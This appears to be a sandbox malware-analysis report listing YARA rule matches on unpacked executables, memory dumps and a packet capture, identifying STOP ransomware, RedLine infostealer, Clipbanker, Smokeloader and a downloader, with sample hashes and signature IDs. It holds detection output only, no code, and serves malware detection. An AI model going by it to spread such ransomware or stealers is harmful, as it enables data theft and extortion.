Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 17.2.325D.exe.4320ee8.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.3.325D.exe.25d0e28.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.325D.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.3.325D.exe.25d0e28.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.2.C474.exe.41215a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 13.2.C474.exe.41215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.325D.exe.4171e76.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 24.2.5274.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 24.2.5274.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.5274.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.5274.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 44.2.5274.exe.41b15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 44.2.5274.exe.41b15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.325D.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.2.5274.exe.41815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.5274.exe.41815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.325D.exe.4172d5e.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.325D.exe.3e30e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.325D.exe.4320ee8.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 44.2.5274.exe.41b15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 44.2.5274.exe.41b15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.5274.exe.40f15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.5274.exe.40f15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.617B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.617B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.5274.exe.40f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.5274.exe.40f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.617B.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.617B.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 20.2.5274.exe.41a15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 20.2.5274.exe.41a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.5274.exe.41815a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.5274.exe.41815a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.E640.exe.41015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.2.E640.exe.41015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.E640.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.E640.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 7.2.617B.exe.41415a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 7.2.617B.exe.41415a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.325D.exe.4172d5e.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 20.2.5274.exe.41a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 20.2.5274.exe.41a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 18.2.C474.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 18.2.C474.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.5274.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.5274.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.325D.exe.4171e76.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 30.2.5274.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 30.2.5274.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.2.5274.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.5274.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 30.2.5274.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 30.2.5274.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.3.325D.exe.3eb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.325D.exe.4320000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 6.2.E640.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.E640.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.E640.exe.41015a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.2.E640.exe.41015a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.2.5274.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.5274.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.325D.exe.4320000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 23.0.FE5F.exe.980000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
Source: 7.2.617B.exe.41415a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 7.2.617B.exe.41415a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 22.2.5274.exe.40515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 22.2.5274.exe.40515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.2.C474.exe.41215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 13.2.C474.exe.41215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 22.2.5274.exe.40515a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 22.2.5274.exe.40515a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 24.2.5274.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 24.2.5274.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 18.2.C474.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 18.2.C474.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.572266464.0000000004071000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000015.00000002.678970915.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
